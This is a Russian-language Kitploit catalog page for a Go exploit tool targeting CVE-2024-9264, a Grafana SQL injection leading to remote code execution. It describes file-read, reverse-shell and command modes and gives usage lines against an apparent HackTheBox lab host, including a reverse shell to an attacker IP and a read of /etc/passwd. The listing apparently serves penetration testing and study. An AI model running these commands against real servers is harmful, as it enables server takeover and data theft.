Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-9264 — A go implementation for CVE-2024-9264 which effect grafana versions 11.0.x, 11.1.x, and 11.2.x. | Kitploit
Инструменты/GitHubGitHub/cythonic1/cve-2024-9264
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubcythonic1/cve-2024-9264

CVE-2024-9264

A go implementation for CVE-2024-9264 which effect grafana versions 11.0.x, 11.1.x, and 11.2.x.

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

🚨 CVE-2024-9264 - SQL-инъекция в Grafana, ведущая к удаленному выполнению кода (RCE) и чтению файлов

Инструмент эксплуатации для CVE-2024-9264, критической уязвимости в Grafana, позволяющей аутентифицированному злоумышленнику выполнить SQL-запрос, ведущий к RCE.

🛡️ Этот инструмент предназначен строго для образовательных целей и авторизованного тестирования на проникновение.
Несанкционированное использование незаконно и неэтично.


🧠 Обзор уязвимости

🕳️ Что такое CVE-2024-9264?

CVE-2024-9264 — это критический недостаток в Grafana, позволяющий аутентифицированному злоумышленнику выполнять SQL-команды, что приводит к RCE и чтению файлов.

🧬 Первопричина

  • Недостаточная очистка.

💥 Воздействие

  • RCE: Выполнение произвольных команд, получение обратных оболочек или чтение конфиденциальных файлов.
  • Высокая степень серьезности: При успешной эксплуатации возможен полный захват сервера.

⚒️ Возможности

  • Поддерживает несколько режимов атаки:
    • file – Чтение произвольных файлов (например, /etc/passwd)
    • shell – Обратная оболочка на машину атакующего
    • command – Выполнение произвольных команд оболочки (например, whoami)
  • Настраиваемые IP-адрес, порт и учетные данные атакующего

🚀 Использование

help menu

Не все аргументы обязательны.

примеры

Получение оболочки

go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell

Чтение файлов

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd

Выполнение одной команды

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'

🔧 Параметры командной строки

go run main.go [flags]

Скачать инструмент